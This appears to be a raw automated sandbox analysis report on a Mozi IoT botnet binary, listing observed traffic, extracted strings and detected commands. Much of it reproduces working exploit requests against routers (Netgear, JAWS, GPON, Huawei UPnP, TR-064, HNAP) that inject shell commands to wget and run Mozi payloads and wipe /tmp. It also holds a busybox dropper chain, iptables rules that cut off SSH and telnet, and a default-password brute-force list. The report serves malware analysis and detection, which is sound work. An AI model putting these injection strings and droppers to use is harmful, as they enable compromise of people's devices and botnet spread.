6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Sample listens on a socket

Source: /tmp/nT7K5GG5km (PID: 4623)

Socket: 0.0.0.0::44040

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 173.128.113.111
Source: unknown	TCP traffic detected without corresponding DNS query: 151.70.88.212
Source: unknown	TCP traffic detected without corresponding DNS query: 37.127.116.2
Source: unknown	TCP traffic detected without corresponding DNS query: 73.213.225.252
Source: unknown	TCP traffic detected without corresponding DNS query: 164.95.80.124
Source: unknown	TCP traffic detected without corresponding DNS query: 3.220.46.172
Source: unknown	TCP traffic detected without corresponding DNS query: 65.119.165.128
Source: unknown	TCP traffic detected without corresponding DNS query: 159.30.196.217
Source: unknown	TCP traffic detected without corresponding DNS query: 112.60.138.223
Source: unknown	TCP traffic detected without corresponding DNS query: 54.72.49.99
Source: unknown	TCP traffic detected without corresponding DNS query: 159.134.45.88
Source: unknown	TCP traffic detected without corresponding DNS query: 169.108.151.225
Source: unknown	TCP traffic detected without corresponding DNS query: 46.69.243.160
Source: unknown	TCP traffic detected without corresponding DNS query: 159.184.117.36
Source: unknown	TCP traffic detected without corresponding DNS query: 45.71.81.134
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.196.152
Source: unknown	TCP traffic detected without corresponding DNS query: 187.65.235.163
Source: unknown	TCP traffic detected without corresponding DNS query: 133.182.208.68
Source: unknown	TCP traffic detected without corresponding DNS query: 105.202.173.103
Source: unknown	TCP traffic detected without corresponding DNS query: 192.37.11.14
Source: unknown	TCP traffic detected without corresponding DNS query: 128.34.103.41
Source: unknown	TCP traffic detected without corresponding DNS query: 65.169.70.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.146.156.163
Source: unknown	TCP traffic detected without corresponding DNS query: 96.200.64.71
Source: unknown	TCP traffic detected without corresponding DNS query: 122.157.60.54
Source: unknown	TCP traffic detected without corresponding DNS query: 99.231.44.225
Source: unknown	TCP traffic detected without corresponding DNS query: 88.83.215.123
Source: unknown	TCP traffic detected without corresponding DNS query: 112.188.233.56
Source: unknown	TCP traffic detected without corresponding DNS query: 106.180.217.144
Source: unknown	TCP traffic detected without corresponding DNS query: 177.228.76.105
Source: unknown	TCP traffic detected without corresponding DNS query: 196.250.243.57
Source: unknown	TCP traffic detected without corresponding DNS query: 80.6.216.131
Source: unknown	TCP traffic detected without corresponding DNS query: 151.160.250.99
Source: unknown	TCP traffic detected without corresponding DNS query: 141.215.180.231
Source: unknown	TCP traffic detected without corresponding DNS query: 18.21.159.227
Source: unknown	TCP traffic detected without corresponding DNS query: 53.12.181.226
Source: unknown	TCP traffic detected without corresponding DNS query: 72.240.24.193
Source: unknown	TCP traffic detected without corresponding DNS query: 168.237.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 60.222.236.176
Source: unknown	TCP traffic detected without corresponding DNS query: 45.220.233.11
Source: unknown	TCP traffic detected without corresponding DNS query: 54.48.115.122
Source: unknown	TCP traffic detected without corresponding DNS query: 65.123.42.165
Source: unknown	TCP traffic detected without corresponding DNS query: 188.61.141.250
Source: unknown	TCP traffic detected without corresponding DNS query: 189.51.61.124
Source: unknown	TCP traffic detected without corresponding DNS query: 99.79.97.187
Source: unknown	TCP traffic detected without corresponding DNS query: 82.32.209.151
Source: unknown	TCP traffic detected without corresponding DNS query: 111.39.224.122
Source: unknown	TCP traffic detected without corresponding DNS query: 54.139.218.167
Source: unknown	TCP traffic detected without corresponding DNS query: 218.150.197.195
Source: unknown	TCP traffic detected without corresponding DNS query: 111.99.121.168

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 112.125.239.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 147.46.176.166:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.22.17.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 1.34.1.251:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 46.249.83.253:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.109.201.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 89.129.183.215:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.106.17.156:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Source: unknown

Source: global traffic

Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m;
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/bin.sh
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: nT7K5GG5km	String found in binary or memory: http://127.0.0.1
Source: nT7K5GG5km	String found in binary or memory: http://127.0.0.1sendcmd
Source: nT7K5GG5km	String found in binary or memory: http://HTTP/1.1
Source: nT7K5GG5km	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: nT7K5GG5km	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: nT7K5GG5km	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: nT7K5GG5km	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: nT7K5GG5km	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: nT7K5GG5km	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk

Source: /tmp/nT7K5GG5km (PID: 4600)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

System Summary:

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls \|\| /bin/busybox cat /bin/ls \|\| while read i; do printf $i; done < /bin/ls \|\| while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Sample contains strings indicative of password brute-forcing capabilities

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: POST /cdn-cgi/
Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample	Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample	Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample	Potential command found: mount -o remount,rw /overlay /
Source: Initial sample	Potential command found: mv -f %s %s
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: killall -9 %s
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample	Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample	Potential command found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Yara signature match

